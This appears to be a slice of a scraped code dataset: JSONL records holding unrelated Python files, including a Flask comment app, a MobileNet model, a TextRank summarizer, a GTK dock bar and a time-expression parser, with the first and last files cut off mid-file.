-> 0.75\n # -15db -> 0.50\n # -5db -> 0.25\n # -0db -> 0.00 (very loud)\n logscale = 1 - math.log10(-0.15 * db + 1)\n return self.clamp(logscale)\n\n def clamp(self, value, min_value=0, max_value=1):\n return max(min(value, max_value), min_value)\n\n def level_callback(self, rms, peak, decay, stream):\n meter_offset = self.channels * stream\n for i in range(0, self.channels):\n self.levelrms[meter_offset + i] = rms[i]\n self.levelpeak[meter_offset + i] = peak[i]\n self.leveldecay[meter_offset + i] = decay[i]\n self.queue_draw()\n","sub_path":"voctogui/lib/audioleveldisplay.py","file_name":"audioleveldisplay.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476500691","text":"#!/usr/bin/env python\n\nfrom distutils.core import setup\nfrom pip.req import parse_requirements\n\ninstall_reqs = parse_requirements(\"requirements.txt\", session=False)\n\nreqs = [str(ir.req) for ir in install_reqs]\n\nsetup(name='pgoapi',\n version='1.0',\n url='https://github.com/tejado/pgoapi',\n packages=['pgoapi'],\n install_requires=reqs)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"87838172","text":"from application import app, db\nfrom flask import redirect, render_template, request, url_for\nfrom flask_login import login_required, current_user\nfrom application.comment.models import Comment\nfrom application.comment.forms import CommentForm\nfrom application.auth.models import User\nfrom application.thread import views\n\n@app.route(\"/comment/delete//\", methods=[\"POST\"])\n@login_required\ndef comment_delete(comment_id):\n comment = Comment.query.get(comment_id)\n\n db.session().delete(comment)\n db.session().commit()\n\n return redirect(url_for(\"thread_index\"))\n\n@app.route(\"/comment/edit/\", methods=[\"POST\"])\n@login_required\ndef comment_edit(comment_id):\n form = CommentForm(request.form)\n comment = Comment.query.get(comment_id)\n\n if not form.validate():\n return render_template(\"thread/editComment.html\", id=comment_id, form=form)\n\n Comment.query.filter_by(id=comment_id).update(\n dict(content=form.comment.data))\n\n db.session.commit()\n\n return redirect(url_for(\"thread_index\"))\n","sub_path":"application/comment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"498344703","text":"import time\nimport numpy as np\nfrom mesa.batchrunner import BatchRunner\nfrom civil_violence_model import CivilViolenceModel\nfrom utils import read_configuration\n\n\ndef experiment_1(replicates=40, max_steps=200, graph_type=\"None\"):\n \"\"\"\n Experiment 1 - Run simulations of civil violence with network model.\n Function to generates data which are used for comparison of network topology influence on civil violence model.\n \"\"\"\n path = 'archives/saved_data_experiment_1_{0}_{1}'.format(int(time.time()), graph_type)\n\n configuration = read_configuration()\n model_params = {}\n model_params.update(configuration) # Overwritten user parameters don't appear in the graphic interface\n model_params.update({'seed': None})\n model_params['graph_type'] = graph_type\n model_params['max_iter'] = max_steps\n\n batch = BatchRunner(CivilViolenceModel,\n max_steps=max_steps,\n iterations=replicates,\n fixed_parameters=model_params,\n model_reporters={'All_Data': lambda m: m.datacollector,\n \"QUIESCENT\": lambda m: m.count_type_citizens(\"QUIESCENT\"),\n \"ACTIVE\": lambda m: m.count_type_citizens(\"ACTIVE\"),\n \"JAILED\": lambda m: m.count_type_citizens(\"JAILED\"),\n \"OUTBREAKS\": lambda m: m.outbreaks}, # attempt all\n display_progress=True)\n\n batch.run_all()\n\n batch_df = batch.get_model_vars_dataframe()\n batch_df = batch_df.drop('All_Data', axis=1)\n\n data = batch_df\n run_data = batch.get_collector_model()\n\n with open(path, 'ab') as f:\n np.save(f, data)\n\n run_path = path+'_run'\n with open(run_path, 'ab') as f:\n np.save(f, run_data)\n\n\nif __name__ == '__main__':\n # Graph_type to be changed to compare influence of each networks\n experiment_1(replicates=2, max_steps=200, graph_type=\"None\")\n","sub_path":"civil_violence/experiment_1.py","file_name":"experiment_1.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156324135","text":"from config import config\nimport pandas as pd\nimport joblib\n\ndef load_dataset(file_name):\n _data = pd.read_csv(config.DATAPATH + file_name)\n return _data\n\ndef save_pipeline(pipeline_to_save):\n save_file_name = 'lasso_regression_v1.pkl'\n save_path = config.SAVED_MODEL_PATH+save_file_name\n joblib.dump(pipeline_to_save, save_path)\n print(\"Saved Pipeline : \",save_file_name)\n\n\ndef load_pipeline(pipeline_to_load):\n save_path = config.SAVED_MODEL_PATH\n trained_model = joblib.load(save_path+pipeline_to_load)\n return trained_model","sub_path":"07_CleanUp/processing/data_management.py","file_name":"data_management.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"205089726","text":"import math\nimport random\nfrom time import sleep\n\nSOL_N = 900\nBATTLE_D =[]\nSOLS = []\nTURN = 0\n\ndef makesol():\n global SOL_N\n global SOLS\n for i in range(0,SOL_N):\n sol = [i,int(130+40*randomGaussian()),1+2*int(i%sqrt(SOL_N)),1+2*int(i/sqrt(SOL_N))]\n SOLS.append(sol)\n\ndef movesol(pos):\n global SOL_N\n pos[2] = pos[2] + random.randint(-1,1)\n pos[3] = pos[3] + random.randint(-1,1)\n for i in range(2,4):\n if pos[i] < 0:\n pos[i] = 0\n if pos[i] > 2*int(sqrt(SOL_N)):\n pos[i] = 2*int(sqrt(SOL_N))\n return(pos)\n\ndef checkstuck(pos,posx,posy):\n global SOLS\n for sol in SOLS:\n if sol[1] < 1:\n continue\n if pos[0] == sol[0]:\n continue\n if (pos[2] == sol[2]) and (pos[3] == sol[3]):\n bp = abs(pos[1] - sol[1])\n cp = random.randint(0,240)\n if cp > bp:\n (pos,sol) = battle(pos,sol)\n else:\n pos[2] = posx\n pos[3] = posy\n break\n return(pos)\n\ndef battle(sol_o,sol_d):\n bp = sol_o[1] - sol_d[1]\n cp = random.randint(-240,240)\n if cp <= bp:\n sol_d[1] = sol_d[1] - 10\n else:\n sol_o[1] = sol_o[1] - 10\n return(sol_o,sol_d)\n\ndef chart(bd):\n for i in range(1,4):\n fill(200)\n rect(0,height-160*i,width,160)\n fill(255)\n rect(5,height-160*i+5,width-10,150)\n for cbd in bd:\n if cbd[0] < 600:\n stroke(255,0,0)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0],height-5,5+cbd[0],height-5-int((cbd[3])/6))\n continue\n if cbd[0] < 1200:\n stroke(255,0,0)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0]-600,height-5-160,5+cbd[0]-600,height-5-160-int((cbd[3])/6))\n continue\n else:\n stroke(255,0,0)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[1]+cbd[2]+cbd[3])/6))\n stroke(0,0,255)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[2]+cbd[3])/6))\n stroke(0)\n line(5+cbd[0]-1200,height-5-320,5+cbd[0]-1200,height-5-320-int((cbd[3])/6))\n fill(0,255,0)\n textSize(18)\n for i in range(0,3):\n text(150+600*i,5+150,height-5-160*i)\n text(300+600*i,5+300,height-5-160*i)\n text(450+600*i,5+450,height-5-160*i)\n text(\"300\",5,height-5-50-160*i)\n text(\"600\",5,height-5-100-160*i)\n text(\"900\",5,height-5-150-160*i)\n\ndef mousePressed():\n if mouseButton == RIGHT:\n loop()\n\ndef setup():\n global SOL_N\n size(int(10*(2*sqrt(SOL_N)+2)),int(10*(2*sqrt(SOL_N)+2)))\n \nmakesol()\n\ndef draw():\n global SOL_N\n global SOLS\n global TURN\n #Draw field and sols\n background(100)\n for i in range(0,int(2*sqrt(SOL_N)+2)):\n line(5,5+i*10,10*(2*sqrt(SOL_N)+2)-5,5+i*10)\n line(5+i*10,5,5+i*10,10*(2*sqrt(SOL_N)+2)-5)\n for sol in SOLS:\n if sol[1] < 1:\n continue\n fill(sol[1],0,0)\n rect(5+10*sol[2],5+10*sol[3],10,10)\n #move and check sols\n for sol in SOLS:\n if sol[1] < 1:\n continue\n mx = sol[2]\n my = sol[3]\n sol = movesol(sol)\n sol = checkstuck(sol,mx,my)\n #Display sols in console\n sols = []\n sn = 0\n for sol in SOLS:\n if sol[1] < 1:\n continue\n sols.append(sol)\n sn = sn + 1\n print(\"TURN:%d\"%TURN)\n print(sols)\n #Resize field\n if sn <= 2:\n SOL_N = 25\n elif sn <= 8:\n SOL_N = 100\n elif sn <= 32:\n SOL_N = 400\n # make battle data\n if TURN < 1800:\n hsn = 0\n msn = 0\n lsn = 0\n for sol in SOLS:\n if sol[1] < 1:\n continue\n if sol[1] > 150:\n hsn = hsn + 1\n continue\n if sol[1] > 50:\n msn = msn + 1\n continue\n else:\n lsn = lsn + 1\n bd = [TURN,hsn,msn,lsn]\n BATTLE_D.append(bd)\n #Draw END\n if sn == 1:\n chart(BATTLE_D)\n fill(200)\n rect(width/2-170,height/2+20,340,60)\n fill(255)\n rect(width/2-165,height/2+25,330,50)\n fill(0)\n textSize(36)\n textAlign(CENTER,CENTER)\n text(\"TURN END:%d\"%TURN,width/2,height/2+50)\n noLoop()\n #Draw turn and number of sols when mouse pressed\n if mousePressed and (mouseButton == LEFT):\n fill(200)\n rect(mouseX+15,mouseY-15,185,60)\n fill(255)\n rect(mouseX+20,mouseY-10,175,50)\n fill(0)\n textSize(24)\n text(\"TURN:%d\"%TURN,mouseX+30,mouseY+12)\n text(\"SOLS = %d\"%sn,mouseX+30,mouseY+37)\n noLoop()\n\n TURN = TURN + 1\n","sub_path":"competition.pyde","file_name":"competition.pyde","file_ext":"pyde","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88941539","text":"import numpy as np\nimport math\n\nLATENCY_FRAMES = 12\n\nclass cars():\n\tdef __init__(self):\n\t\tself.boxes = []\n\n\tdef get_sensible_boxes(self, new_boxes):\n\t\tfor prev_box in self.boxes:\n\t\t\tprev_box.current_frame = False\n\t\tfor box in new_boxes:\n\t\t\tmin_dist = 1000\n\t\t\tepsilon = 20\n\t\t\tclosest_centroid = None\n\t\t\tnew_car_box = car_box(box)\n\t\t\tprint('ss{}'.format(box))\n\t\t\tfor prev_box in self.boxes:\n\t\t\t\tdist = prev_box.dist(new_car_box.centroid) \n\t\t\t\tif(dist < min_dist):\n\t\t\t\t\tprint('dist ' + str(dist))\n\t\t\t\t\tmin_dist = dist\n\t\t\t\t\tclosest_centroid = prev_box\n\t\t\tif(closest_centroid != None):\n\t\t\t\tif(prev_box.current_frame == False):\n\t\t\t\t\tif(not closest_centroid.same_center(new_car_box)):\n\t\t\t\t\t\tself.boxes.append(new_car_box)\n\t\t\telse:\n\t\t\t\tprint('append')\n\t\t\t\tprint(new_car_box.box)\n\t\t\t\tself.boxes.append(new_car_box)\n\t\tfor box in self.boxes:\n\t\t\tif(not box.current_frame):\n\t\t\t\tif(box.suspitious > 0):\n\t\t\t\t\tprint('suspitious' + str(box.suspitious))\n\t\t\t\t\tif(box.suspitious >= LATENCY_FRAMES):\n\t\t\t\t\t\tprint('remove')\n\t\t\t\t\t\tprint(box.box)\n\t\t\t\t\t\tself.boxes.remove(box)\n\t\t\t\t\tbox.suspitious += 1\n\t\t\t\telse:\n\t\t\t\t\tprint('suspitious 1')\n\t\t\t\t\tprint(box.box)\n\t\t\t\t\tbox.suspitious = 1\n\t\toutput_boxes = []\t\t\n\t\tfor box in self.boxes:\n\t\t\t#if(box.suspitious <= 0):\n\t\t\toutput_boxes.append(box.get_output_box())\n\t\t\tprint('centroid')\n\t\t\tprint(box.centroid)\n\t\t\tprint('prev_centroids')\n\t\t\tprint(box.prev_centroids)\n\t\treturn output_boxes\n\nclass car_box():\n\tdef __init__(self, box):\n\t\tself.box = box\n\t\tself.centroid = car_box.get_center(box)\n\t\tself.width = abs(box[0][0] - box[1][0])\n\t\tself.height = abs(box[0][1] - box[1][1])\n\t\tself.prev_centroids = []\n\t\tself.prev_width = []\n\t\tself.prev_height = []\n\t\tself.current_frame = True\n\t\tself.suspitious = 1\n\n\tdef same_center(self, box):\n\t\twidths = np.hstack((self.prev_width, [self.width]))\n\t\theights = np.hstack((self.prev_height, [self.height]))\n\t\tepsilon = max(60, 1.3 * (sum(widths) + sum(heights))/float(len(widths) + len(heights)))\n\t\tif(self.dist(box.centroid) < epsilon):\n\t\t\tif(len(self.prev_centroids) >= LATENCY_FRAMES):\n\t\t\t\tself.prev_centroids.pop(0)\n\t\t\t\tself.prev_width.pop(0)\n\t\t\t\tself.prev_height.pop(0)\n\t\t\tself.prev_centroids.append(self.centroid)\n\t\t\tself.prev_width.append(self.width)\n\t\t\tself.prev_height.append(self.height)\n\t\t\tself.box = box.box\n\t\t\tself.centroid = box.centroid\n\t\t\tself.width = box.width\n\t\t\tself.height = box.height\n\t\t\tself.current_frame = True\n\t\t\tself.suspitious = 0\n\t\t\treturn True\n\t\treturn False\n\t\n\t@staticmethod\n\tdef get_center(box):\n\t\treturn ((box[0][0] + box[1][0])/2.0, (box[0][1] + box[1][1])/2.0)\n\n\tdef dist(self, point):\n\t\treturn math.sqrt(math.pow(point[0] - self.centroid[0], 2) + math.pow(point[1] - self.centroid[1], 2))\n\n\tdef get_output_box(self):\n\t\tcenter = self.center_point(self.prev_centroids, self.centroid)\n\t\twidth = np.hstack((self.prev_width, [self.width]))\n\t\twidth = sum(width) / float(len(width))\n\t\theight = np.hstack((self.prev_height, [self.height]))\n\t\theight = sum(height) / float(len(height))\n\t\tresult = ((int(round(center[0] - width / 2.0)), int(round(center[1] - height / 2.0))), (int(round(center[0] + width / 2.0)), int(round(center[1] + height / 2.0))))\n\t\tprint('output')\n\t\tprint(result)\n\t\treturn result\n\n\tdef center_point(self, points, another_point):\n\t\txs = 0\n\t\tys = 0\n\t\tfor point in points:\n\t\t\txs += point[0]\n\t\t\tys += point[1]\n\t\txs+=another_point[0]\n\t\tys+=another_point[1]\n\t\treturn (xs/(len(points) + 1), ys/(len(points) + 1))\n\n\n","sub_path":"cars.py","file_name":"cars.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7680395","text":"import nltk\nimport numpy as np\nimport re\nfrom nltk.corpus import stopwords, brown\nfrom nltk.cluster.util import cosine_distance\nfrom operator import itemgetter\n\nnltk.download('stopwords')\nnltk.download('brown')\n# np.seterr(divide='ignore', invalid='ignore')\n\n# parameters\nMIN_WORD_LEN = 2\nMIN_WORDS_IN_SENT = 4\n\n\ndef page_rank(sim_matrix, eps=0.0001, d=0.85):\n R = np.ones(len(sim_matrix))\n\n while True:\n r = np.ones(len(sim_matrix)) * (1 - d) + d * sim_matrix.T.dot(R)\n if abs(r - R).sum() <= eps:\n return r\n R = r\n\n # ones_matrix = np.ones(len(sim_matrix))\n # P = ones_matrix / len(sim_matrix)\n # # print(P)\n #\n # while True:\n # new_P = np.ones(len(sim_matrix)) * (1 - d) / len(sim_matrix) + d * sim_matrix.T.dot(P)\n # delta = abs(new_P - P).sum()\n # if delta <= eps:\n # return new_P\n # P = new_P\n\n\ndef sentence_similarity(sentence_1, sentence_2, stop_words):\n if stop_words is None:\n stop_words = []\n\n sent1a = []\n for word in sentence_1:\n sent1a.append(word.lower())\n\n sent2a = []\n for word in sentence_2:\n sent2a.append(word.lower())\n\n all_words = list(set(sent1a + sent2a))\n\n vector1 = [0] * len(all_words)\n vector2 = [0] * len(all_words)\n\n for word in sentence_1:\n if word in stop_words:\n continue\n vector1[all_words.index(word.lower())] += 1\n\n for word in sentence_2:\n if word in stop_words:\n continue\n vector2[all_words.index(word.lower())] += 1\n\n cos_dist = cosine_distance(vector1, vector2)\n\n val = 1.0 - cos_dist\n\n return val\n\n\ndef build_similarity_matrix(sentences, stop_words):\n num_sentences = len(sentences)\n s = np.zeros((num_sentences, num_sentences))\n\n for index1 in range(num_sentences):\n for index2 in range(num_sentences):\n if index1 == index2:\n continue\n sentence_sim = sentence_similarity(sentences[index1], sentences[index2], stop_words)\n s[index1][index2] = sentence_sim\n\n for index3 in range(len(s)):\n if s[index3].sum() == 0:\n continue\n s[index3] /= s[index3].sum()\n\n print(s)\n\n return s\n\n\ndef main():\n stop_words = stopwords.words('english')\n\n with open(\"in1.txt\", \"r\") as input_file:\n text = input_file.readlines()\n\n sentences0 = nltk.sent_tokenize(text[0])\n\n sentences = []\n for sent in sentences0:\n # Removing Square Brackets and Extra Spaces\n sent = sent.lower()\n sent = re.sub(r'\\[[0-9]*\\]', ' ', sent)\n sent = re.sub(r'\\s+', ' ', sent)\n\n # Removing special characters and digits\n formatted_sent = re.sub('[^a-zA-Z]', ' ', sent)\n formatted_sent = re.sub(r'\\s+', ' ', formatted_sent)\n\n words = nltk.word_tokenize(formatted_sent)\n\n # Removing single letter words\n for word in words:\n if len(word) < MIN_WORD_LEN:\n words.remove(word)\n\n if len(words) > MIN_WORDS_IN_SENT:\n sentences.append(words)\n\n s = build_similarity_matrix(sentences, stop_words)\n\n sentence_ranks = page_rank(s)\n\n # print(sentence_ranks)\n\n # Sort the sentence ranks\n for item in sorted(enumerate(sentence_ranks), key=lambda item: -item[1]):\n ranked_sentence_indexes = item[0]\n\n selected_sentences = sorted(ranked_sentence_indexes[:7])\n\n summary = itemgetter(*selected_sentences)(sentences)\n\n # for sentence in summary:\n # print(' '.join(sentence))\n\n\nmain()\n","sub_path":"backend/nlp/src/old/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"82246922","text":"# coding: utf-8\n# Original implementation from peisuke\n# https://github.com/peisuke/DeepLearningSpeedComparison/blob/master/chainer/mobilenet/predict.py\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\n\n\nclass ConvBN(chainer.Chain):\n def __init__(self, inp, oup, stride):\n super(ConvBN, self).__init__()\n with self.init_scope():\n self.conv=L.Convolution2D(inp, oup, 3, stride=stride, pad=1, nobias=True)\n self.bn=L.BatchNormalization(oup)\n\n def __call__(self, x):\n h = F.relu(self.bn(self.conv(x)))\n return h\n\n\nclass ConvDW(chainer.Chain):\n def __init__(self, inp, oup, stride):\n super(ConvDW, self).__init__()\n with self.init_scope():\n self.conv_dw=L.DepthwiseConvolution2D(inp, 1, 3, stride=stride, pad=1, nobias=True)\n self.bn_dw=L.BatchNormalization(inp)\n self.conv_sep=L.Convolution2D(inp, oup, 1, stride=1, pad=0, nobias=True)\n self.bn_sep=L.BatchNormalization(oup)\n\n def __call__(self, x):\n h = F.relu(self.bn_dw(self.conv_dw(x)))\n h = F.relu(self.bn_sep(self.conv_sep(h)))\n return h\n \n\nclass MobileNet(chainer.Chain):\n def __init__(self, n_classes=1000, n_base_units=32):\n super().__init__()\n self.n_classes = n_classes\n with self.init_scope():\n self.conv_bn = ConvBN(3, n_base_units, 2)\n self.conv_ds_2 = ConvDW(n_base_units, n_base_units * 2, 1)\n self.conv_ds_3 = ConvDW(n_base_units * 2, n_base_units * 4, 2)\n self.conv_ds_4 = ConvDW(n_base_units * 4, n_base_units * 4, 1)\n self.conv_ds_5 = ConvDW(n_base_units * 4, n_base_units * 8, 2)\n self.conv_ds_6 = ConvDW(n_base_units * 8, n_base_units * 8, 1)\n self.conv_ds_7 = ConvDW(n_base_units * 8, n_base_units *16, 2)\n\n self.conv_ds_8 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_9 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_10 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_11 = ConvDW(n_base_units *16, n_base_units *16, 1)\n self.conv_ds_12 = ConvDW(n_base_units *16, n_base_units *16, 1)\n\n self.conv_ds_13 = ConvDW(n_base_units *16, n_base_units *32, 2)\n self.conv_ds_14 = ConvDW(n_base_units *32, n_classes, 1)\n\n def __call__(self, x, t):\n h = self.predict(x)\n loss = F.softmax_cross_entropy(h, t)\n chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)\n return loss\n \n def predict(self, x):\n h = self.conv_bn(x)\n h = self.conv_ds_2(h)\n h = self.conv_ds_3(h)\n h = self.conv_ds_4(h)\n h = self.conv_ds_5(h)\n h = self.conv_ds_6(h)\n h = self.conv_ds_7(h)\n h = self.conv_ds_8(h)\n h = self.conv_ds_9(h)\n h = self.conv_ds_10(h)\n h = self.conv_ds_11(h)\n h = self.conv_ds_12(h)\n h = self.conv_ds_13(h)\n h = self.conv_ds_14(h)\n h = F.average_pooling_2d(h, 7, stride=1)\n h = F.reshape(h, (h.data.shape[0], h.data.shape[1]))\n return h\n","sub_path":"image-classification/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421558430","text":"'''\nA sorted array is rotated at some point, find that point via binary search\n'''\n\nimport random\n\nA = list(range(100))\nn = random.randint(0, len(A) - 1)\nA = A[n:] + A[:n]\n\ndef find_pivot(A):\n left, right = 0, len(A) - 1\n while left < right:\n midpoint = left + (right - left) // 2\n if A[midpoint] > A[right]:\n left = midpoint + 1\n else:\n right = midpoint\n return left\n\npivot = find_pivot(A)\nprint('Rotated', A)\nprint('A[{i}] = {j}'.format(i=pivot, j=A[pivot]))\nprint('Unrotated', A[pivot:] + A[:pivot])\n","sub_path":"searching/rotation_point.py","file_name":"rotation_point.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"476884103","text":"#!/usr/bin/env python3\n\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_foreign('cairo')\nfrom gi.repository import Gtk, Gdk, Gio\n\nimport cairo\nimport xcffib as xcb\nimport xcffib.xproto as xproto\n\nimport asyncio\nimport os\nimport struct\nimport time\n\n# locals\nimport battery\nimport bspwm\n\nclass Win(Gtk.Window):\n def __init__(self, show=True, **kargs):\n Gtk.Window.__init__(self, **kargs)\n\n # enable true transparency\n screen = self.get_screen()\n visual = screen.get_rgba_visual()\n if visual != None and screen.is_composited():\n self.set_visual(visual)\n\n # be able to draw stuff ourselves\n self.set_app_paintable(True)\n # self.connect('draw', self.area_draw)\n\n if show:\n self.show_all()\n\n def screen_geom(self):\n # get screen size\n screen = self.get_screen()\n monitor = screen.get_monitor_at_window(screen.get_active_window())\n return screen.get_monitor_geometry(monitor)\n\n def property_change(self, prop, prop_type, form, mode, data):\n # Gobject has no API to set properties (strangely), so we have to use xcb instead\n conn = xcb.connect()\n def get_atom(atom):\n ia = conn.core.InternAtom(False, len(atom), atom)\n return ia.reply().atom\n\n conn.core.ChangePropertyChecked(int(mode), self.get_window().get_xid(), get_atom(prop), get_atom(prop_type),\n form, int(len(data) / form * 8), data).check()\n\nclass Dock(Win):\n def __init__(self, **kwargs):\n Win.__init__(self, show=False, **kwargs)\n\n # make it a dock\n self.set_type_hint(Gdk.WindowTypeHint.DOCK)\n self.set_decorated(False)\n # self.set_resizable(False)\n\n # set size\n geom = self.screen_geom()\n self.move(0, 0)\n self.resize(30, geom.height)\n # self.set_default_size(30, 500)\n # self.set_size_request(30, 500)\n\n # win_geom = Gdk.Geometry()\n # win_geom.max_width = 30\n # win_geom.max_height = geom.height\n # self.set_geometry_hints(self, win_geom, Gdk.WindowHints.MAX_SIZE)\n\n # required for property_change\n self.show_all()\n\n # left, right, top, bottom, left_start_y, left_end_y, right_start_y, right_end_y, top_start_x, top_end_x, bottom_start_x, bottom_end_x\n strut = [0] * 12\n strut[0] = 30\n strut[5] = geom.height\n self.property_change('_NET_WM_STRUT_PARTIAL', 'CARDINAL', 32, Gdk.PropMode.REPLACE, struct.pack('I' * 12, *strut))\n self.property_change('_NET_WM_STRUT', 'CARDINAL', 32, Gdk.PropMode.REPLACE, struct.pack('I' * 4, *strut[0:4]))\n\nclass Clock(Gtk.Label):\n def __init__(self, fmt):\n Gtk.Label.__init__(self)\n self.time_fmt = fmt\n self.get_style_context().add_class(\"clock\")\n\n async def loop():\n while True:\n self.update_time()\n await asyncio.sleep(1)\n\n asyncio.ensure_future(loop())\n\n def update_time(self):\n self.set_markup(time.strftime(self.time_fmt))\n self.set_tooltip_text(time.strftime('%c'))\n\ndef PowerButton():\n menu = Gtk.Menu()\n for l,e in [\n (\"shutdown\", lambda _: os.system(\"systemctl poweroff\")),\n (\"reboot\", lambda _: os.system(\"systemctl reboot\")),\n (\"logout\", lambda _: os.system(\"systemctl --user stop x11@{}.target\".format(os.getenv(\"DISPLAY\")))),\n (None, None),\n (\"hibernate\", lambda _: os.system(\"systemctl hibernate\")),\n (\"suspend\", lambda _: os.system(\"systemctl suspend\")),\n (\"hybrid sleep\", lambda _: os.system(\"systemctl hybrid-sleep\")),\n ]:\n if l is None:\n menu.append(Gtk.SeparatorMenuItem())\n continue\n mi = Gtk.MenuItem(l)\n mi.connect(\"activate\", e)\n menu.append(mi)\n menu.show_all()\n\n button = Gtk.Button(name=\"power-button\", relief=Gtk.ReliefStyle.NONE)\n button.add(Gtk.Label(label=\"⏻\"))\n button.connect('clicked', lambda _: menu.popup_at_pointer())\n\n return button\n\ndef EBox(widget, *args, **kwargs):\n event_box = Gtk.EventBox(*args, **kwargs);\n event_box.add(widget)\n return event_box\n\ndef init():\n win = Dock()\n\n top = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n mid = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, valign=Gtk.Align.CENTER)\n bot = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, valign=Gtk.Align.END)\n bigbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n bigbox.set_homogeneous(True)\n\n bigbox.add(EBox(top, name=\"topbox\"))\n bigbox.add(EBox(mid, name=\"midbox\"))\n bigbox.add(EBox(bot, name=\"botbox\"))\n win.add(bigbox)\n\n mid.add(bspwm.DesktopView())\n\n bot.add(Clock('%I\\n%M\\n%S'))\n bot.add(battery.Battery())\n bot.add(PowerButton())\n\n async def tray():\n await asyncio.sleep(0.2)\n await asyncio.create_subprocess_exec(\"stalonetray\", \"-c\", \"/dev/null\",\n \"--vertical\", \"--slot-size\", \"30\", \"--window-strut\", \"left\",\n \"--transparent\", \"--grow-gravity\", \"N\", \"--sticky\")\n\n asyncio.ensure_future(tray())\n\n win.show_all()\n win.connect('delete-event', lambda *args: asyncio.get_event_loop().stop())\n\n return win\n","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216905691","text":"\"\"\"\nParses time expressions into dateutil relative dates::\n\n >>> def rr(expr):\n ... print rrule_repr(parse(expr))\n >>> rr('Wednesday 2am')\n rrule(HOURLY, byhour=2, byweekday=2)\n >>> rr('Wed 14:00')\n rrule(MINUTELY, byhour=14, byweekday=2)\n >>> rr('Wed(1)')\n rrule(WEEKLY, bysetpos=1, byweekday=2)\n >>> rr('5min')\n rrule(MINUTELY, interval=5)\n >>> rr('1 hour')\n rrule(HOURLY)\n >>> rr('1 hour 5 minute')\n rrule(MINUTELY, interval=65)\n >>> rr('1 day')\n rrule(DAILY)\n >>> rr('calendar day 1')\n rrule(MONTHLY, bymonthday=1)\n\"\"\"\n\nimport re\nimport datetime\nimport dateutil.relativedelta as rel\nfrom dateutil import rrule\n\ndays = 'monday|mon|mo|tuesday|tues|tue|tu|wednesday|wednseday|wednsday|wedsday|wedesday|wensday|wed|we|thursday|thurs|thur|thu|th|friday|frid|fri|fr|saturday|satur|sat|sa|sunday|sun|su'\nday_map = {\n 'mo': rel.MO, 'tu': rel.TU, 'we': rel.WE, 'th': rel.TH, 'fr': rel.FR, 'sa': rel.SA, 'su': rel.SU}\ndays_re = re.compile(days, re.I)\n\nday_spec = '('+days+')[(](-?[0-9]+)[)]'\nday_spec_re = re.compile(day_spec, re.I)\n\nunits = '([0-9]+)\\s*(seconds|second|secs|sec|minutes|minute|mins|min|hours|hour|days|day|weeks|week|months|month|years|year|yrs|yr)'\nunit_map = {\n 'se': rrule.SECONDLY,\n 'mi': rrule.MINUTELY,\n 'ho': rrule.HOURLY,\n 'da': rrule.DAILY,\n 'we': rrule.WEEKLY,\n 'mo': rrule.MONTHLY,\n 'ye': rrule.YEARLY,\n 'yr': rrule.YEARLY,\n }\nunits_re = re.compile(units, re.I)\n\nunit_trans = {\n (rrule.SECONDLY, rrule.MINUTELY): 60,\n (rrule.SECONDLY, rrule.HOURLY): 60*60,\n (rrule.SECONDLY, rrule.DAILY): 60*60*24,\n (rrule.SECONDLY, rrule.WEEKLY): 60*60*24*7,\n (rrule.SECONDLY, rrule.MONTHLY): 60*60*24*30,\n (rrule.SECONDLY, rrule.YEARLY): 60*60*24*395,\n (rrule.MINUTELY, rrule.HOURLY): 60,\n (rrule.MINUTELY, rrule.DAILY): 60*24,\n (rrule.MINUTELY, rrule.WEEKLY): 60*24*7,\n (rrule.MINUTELY, rrule.MONTHLY): 60*24*30,\n (rrule.MINUTELY, rrule.YEARLY): 60*24*365,\n 